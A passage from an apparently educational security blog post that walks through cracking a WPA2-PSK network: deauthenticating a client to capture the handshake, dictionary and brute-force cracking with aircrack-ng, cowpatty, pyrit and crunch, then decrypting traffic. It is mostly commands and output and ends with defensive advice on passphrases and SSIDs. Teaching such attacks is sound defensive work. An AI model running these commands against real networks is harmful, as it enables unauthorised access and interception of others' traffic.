wlan0     Link encap:Ethernet  HWaddr 00:de:ad:be:ef:00 

The next step will be to enable monitor mode  on wlan0 interface. The monitor mode for wireless card is the same as promiscuous mode for a Ethernet card with one advantage. The wireless spectrum is a shared medium.

$ sudo airmon-ng start wlan0

Interface             Chipset                 Driver
wlan0                    Intel 4965AGN   iwl4965 – [phy0]
                                                                (monitor mode enabled on mon0)

Now, Evil can  use airodump-ng wireless packet capture tool to show networks matching WPA encryption (–encrypt wpa) on the interface that is configured as monitor mode.

$sudo airodump-ng -i mon0 –encrypt wpa

After an initial recon and scanning of the available wireless networks. He can select the one who has clients associated with it. In this case the one on channel 8 with the BSSID 00:12:80:ED:41:C0 and SSID SecureHomeNet.
Then, he can capture all raw 802.11 frames for this particular network. With this he can use aircrack-ng and others to crack the wpa2-handshake. To do this airodump-ng is executed on channel 8 (-c 8) with the selected access point MAC address (–bssid). The contents of the capture are written (-w) to file outputfile.

$sudo airodump-ng -c 8 –bssid 00:12:80:ED:41:C0 -w outputfile mon0

While running this and checking which clients are associated with the access point. He opens another shell and can inject packets into this specified wireless network using the MAC address of a client connected to the access point. There are different attacks techniques that can be used. The one used is the deauthentication attack with 5 attempts (–deauth=5). This will allows Evil to capture WPA/WPA2 handshakes by forcing clients to re-authenticate. The (-a) is the MAC address of the access point and the (-h) is the host/client.

$ sudo aireplay-ng –deauth=5 -e SecureHomeNet -a 00:12:80:ED:41:C0 -h 00:24:2C:6F:50:5D mon0

The interface MAC (00:1D:E0:04:AE:71) doesn’t match the specified MAC (-h).
                ifconfig mon0 hw ether 00:24:2C:6F:50:5D
10:30:04  Waiting for beacon frame (BSSID: 00:12:80:ED:41:C0) on channel 8
NB: this attack is more effective when targeting a connected wireless client (-c <client’s mac>).
10:30:04  Sending DeAuth to broadcast — BSSID: [00:12:80:ED:41:C0]
10:30:05  Sending DeAuth to broadcast — BSSID: [00:12:80:ED:41:C0]
10:30:05  Sending DeAuth to broadcast — BSSID: [00:12:80:ED:41:C0]
10:30:05  Sending DeAuth to broadcast — BSSID: [00:12:80:ED:41:C0]
10:30:06  Sending DeAuth to broadcast — BSSID: [00:12:80:ED:41:C0]

If all goes well after the attack finish the handshake should appear in the top right corner of the airodump-ng shell.
He can now stop the airdump-ng verify that he has the four-way handshake and then launch a brute force attack. First using tshark to filter by EAPOL it shows 4 packets.

$ ls -lisa *.cap
2498937 408 -rw-r–r– 1 root root 414162 2012-12-01 05:01 outputfile-01.cap

$ tshark -nnr outputfile-01.cap -R ‘eapol’
2536 337.964671 00:12:80:ed:41:c0 -> 00:24:2c:6f:50:5d EAPOL 155 Key (msg 1/4)
2538 337.981066 00:24:2c:6f:50:5d -> 00:12:80:ed:41:c0 EAPOL 155 Key (msg 2/4)
2540 337.984640 00:12:80:ed:41:c0 -> 00:24:2c:6f:50:5d EAPOL 205 Key (msg 3/4)
2542 337.989262 00:24:2c:6f:50:5d -> 00:12:80:ed:41:c0 EAPOL 133 Key (msg 4/4)

Then, to make sure the handshake is enough to mount a brute force or dictionary attack pyrit can be used with (–r) to read the packet capture using analyze parameter.

$ pyrit -r outputfile-01.cap analyze
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file ‘outputfile-01.cap’ (1/1)…
Parsed 38 packets (38 802.11-packets), got 1 AP(s)
#1: AccessPoint 00:12:80:ed:41:c0 (‘SecureHomeNet’):
  #1: Station 00:24:2c:70:fa:5d
  #2: Station 20:54:76:27:85:a4
  #3: Station 04:54:53:7f:4f:af
  #4: Station 00:24:2c:6f:50:5d, 1 handshake(s):
    #1: HMAC_SHA1_AES, good, spread 1

The required handshake is obtained. Evil can know mount a offline dictionary attack. He knows that the Wpa pre-shared key can be between 8 and 63 ASCII characters long.
He can first attempt a dictionary attack using aircrack-ng with (–w) to specify the list of words, (–e) to specify the SSID and the packet capture that holds the handshake. The word-lists can be easily obtained from Internet. For example from Openwall website.

$ aircrack-ng -w /pentest/passwords/wordlists/password-2011.lst -e SecureHomeNet outputfile-01.cap

Other than aircrack-ng he could use cowpatty created by Joshua Wright. The command is executed with (-f) to load word-list,  (-s) to specify the SSID, (-r) to read the packet capture with the handshake and (-2) in case the capture contains less than the 4 frames in the four-way handshake.

$ cowpatty -f /pentest/passwords/wordlists/password-2011.lst -s SecureHomeNet -r ~/outputfile-01.cap -2
cowpatty 4.6 – WPA-PSK dictionary attack. jwright@hasborg.com
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack.  Please be patient.
key no. 1000: 05091975
key no. 2000: 1010362776
The PSK is “1qaz2wsx”.

Or he could use Pyrit. Pyrit has the ability to use multiple CPUs and GPUs which can be extremely powerful and efficient.
To use pyrit we need three steps : Create an SSID, a password database with an imported wordlist and, finally we launch a brute-force attack using attack_batch

$ pyrit -e SecureHomeNet create_essid
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at ‘file://’…  connected.
Created ESSID ‘SecureHomeNet’

$pyrit -i /pentest/passwords/wordlists/password-2011.lst import_passwords
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at ‘file://’…  connected.
995760 lines read. Flushing buffers…. …
All done.

$pyrit -r ~/outputfile-01.cap -e SecureHomeNet attack_batch
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at ‘file://’…  connected.
Parsing file ‘/home/user/outputfile-01.cap’ (1/1)…
Parsed 38 packets (38 802.11-packets), got 1 AP(s)
Picked AccessPoint 00:12:80:ed:41:c0 automatically…
Attacking handshake with station 00:24:2c:6f:50:5d
Tried 841112 PMKs so far (84.4%); 567 PMKs per second.
The password is ‘1qaz2wsx’.

After obtaining the pass-phrase,  it’s game over! Which can potentially be done easily with a good dictionary, Evil can know decrypt the wireless traffic using airdecap. With (-e) to specify the SSID and (-p) for the pass-phrase  Airdecap will write a new pcap file with the decrypted traffic.
$ airdecap-ng -e SecureHomeNet -p 1qaz2wsx outputfile-01.cap
Total number of packets read          2939
Total number of WEP data packets         0
Total number of WPA data packets       708
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets        17

$ ls -lisa *dec.cap
2499178 8 -rw-r–r– 1 user user 4284 2012-12-01 11:03 outputfile-01-dec.cap

Or use tshark with (-o) to specify preference settings. In this case the wlan.enable_decryption and wlan.web_key parameters. The available settings can been seen with the command $ tshark -G currentprefs | grep wlan.

$tshark -r outputfile-01.cap -o “wlan.enable_decryption:TRUE” -o wlan.wep_key1:wpa-pwd:1qaz2wsx:SecureHomeNet

Further, If the dictionary attack is unsuccessful because the pass-phrase used is not on the dictionary. Other attack vectors are available. Evil can mount a brute force attack which compute all possible passwords combinations. For example from letter a-z and numbers 0-9 using crunch. The drawback is that this will be ineffective, expensive and extremely time consuming.

The following output of crunch illustrates how much space would be needed to generate a word-list with all the combinations possible of lower case alphabet (26 characters) plus numbers range from 0 to 9. Using a pass-phrase of minimum and maximum of 8 characters.

$crunch 8 8 1234567890abcdefghijkmlnopqrstuvxywz
Crunch will now generate the following amount of data: 25389989167104 bytes
24213780 MB
23646 GB
23 TB
0 PB

Evil could combine aircrack-ng with crunch. Basically aircrack-ng accepts passwords from standard input. Then, he can redirect the output from crunch into aircrack-ng. Within crunch its chosen the minimum (8) and maxim password (8) length plus the keyspace
$crunch 8 8 1234567890abcdefghijkmlnopqrstuvxwzy | aircrack-ng  -e SecureHomeNet outputfile-01.cap -w –

Or he could use John the Ripper redirecting the output of it to aircrack-ng:
john$ sudo ./john –stdout –incremental:all | aircrack-ng  -e SecureHomeNet ~/outputfile-01.cap -w –

Both of this attack will most likely fail. Evil doesn’t know how many characters the pass-phrase has. Plus its using a limited key space which will take a significant amount of time. For example a 5 character password consisting of lowercase, and digits has 200 billion combinations. At the modest rate of 10.000 passwords attempts a second it can be broken in 90 minutes. For a 8 character password consisting of lowercase, uppercase, and digits it has 218 trillion combinations. At rate of 10.000 password attempts a second will take 692 years to break[1]. The best alternative Evil got is to use a good dictionary/word-list or using precomputed hashes (aka rainbow tables).

Other than decrypting the traffic. If  Evil obtained your pass-phrase either by brute force or dictionary attack,  he can connect to your network. If that happens you are exposed to extremely devastating network attacks such as arp spoofing, phishing, DNS poisoning and others.

How can you defend to this attack ?
The best countermeasure to prevent WPA-PSK attacks is to choose a good pass-phrase  Make sure is at least 12 characters long with a combination of numbers, upper and lower case letters plus special characters. In addition, choose a unique SSID. if your SSID is Home, Linksys or one of the top 1000, than most likely there is hash table with precomputed passwords for your SSID.

References:
[1] http://www.lockdown.co.uk/?pg=combi
Hacking Exposed Wireless: Wireless Security Secrets & Solutions

Tagged , , , , , ,
gb_master's /dev/null

... and I said, "Hello, Satan. I believe it's time to go."

Source Code Auditing, Reversing, Web Security

Finding Hidden codes in the software

BruteForce Lab's Blog

security, programming, devops, visualization, the cloud

Count Upon Security

Increase security awareness. Promote, reinforce and learn security skills.

Naked Security

Computer Security News, Advice and Research

Didier Stevens

(blog \'DidierStevens)

malwology

Adventures in double-clicking malware / by Anuj Soni

Rational Survivability

Hoff's Ramblings about Information Survivability, Information Centricity, Risk Management and Disruptive Innovation.

SANS Internet Storm Center, InfoCON: green

Increase security awareness. Promote, reinforce and learn security skills.

TaoSecurity

Increase security awareness. Promote, reinforce and learn security skills.

Schneier on Security

Increase security awareness. Promote, reinforce and learn security skills.

Technicalinfo.net Blog

Increase security awareness. Promote, reinforce and learn security skills.

Lenny Zeltser

Increase security awareness. Promote, reinforce and learn security skills.

Krebs on Security

In-depth security news and investigation